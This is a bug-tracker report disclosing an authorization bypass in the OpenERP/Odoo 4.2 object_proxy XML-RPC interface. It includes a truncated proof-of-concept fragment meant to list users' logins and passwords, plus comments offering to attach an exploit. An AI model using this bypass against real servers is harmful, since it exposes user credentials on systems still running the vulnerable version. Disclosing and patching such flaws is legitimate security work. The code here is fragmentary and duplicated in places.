[4.2] Netsvc object_proxy bypass
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
Odoo Server (MOVED TO GITHUB) |
Invalid
|
Undecided
|
Unassigned | ||
4.2 |
Fix Released
|
High
|
Stephane Wirtel (OpenERP) |
Bug Description
It's possible to call any method of object xml-rpc interface using another interface called object_proxy. The only requisit is that server is initialitzed (eg. someone do the login or tries to login).
This is solved in 5.0 but not in 4.2.
In bazaar 4.2 is tagged as mature and I can't undersant why this patch is not ported to this branch.
I attach a simple patch that we use in our production servers which someones still working on 4.2 version.
Proof of concept:
sock = xmlrpclib.
ids = sock.execute(
f = sock.execute(
for u in f:
print ' user: %s pass: %s' % (u['login'], u['password'])
Related branches
visibility: | private → public |
Changed in openobject-server: | |
status: | Incomplete → Invalid |
Changed in openobject-server: | |
importance: | High → Undecided |
Anyone of the QT has seen this bug??
There are a lot of working servers in Internet that has this bug...
Attatch one of the possibles exploits? field.comment= Anyone of the QT has seen this bug??
There are a lot of working servers in Internet that has this bug...
Attatch one of the possibles exploits